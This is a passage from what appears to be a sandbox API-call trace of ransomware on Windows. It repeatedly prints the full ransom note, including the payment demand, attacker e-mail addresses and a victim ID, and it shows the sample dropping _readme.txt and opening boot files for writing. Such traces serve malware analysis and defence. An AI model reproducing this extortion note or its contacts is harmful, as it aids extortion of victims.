e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.509] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.509] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.510] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*" (normalized: "c:\\boot\\ru-ru\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.511] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.511] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.511] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0179.511] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.512] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.512] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.512] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.512] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 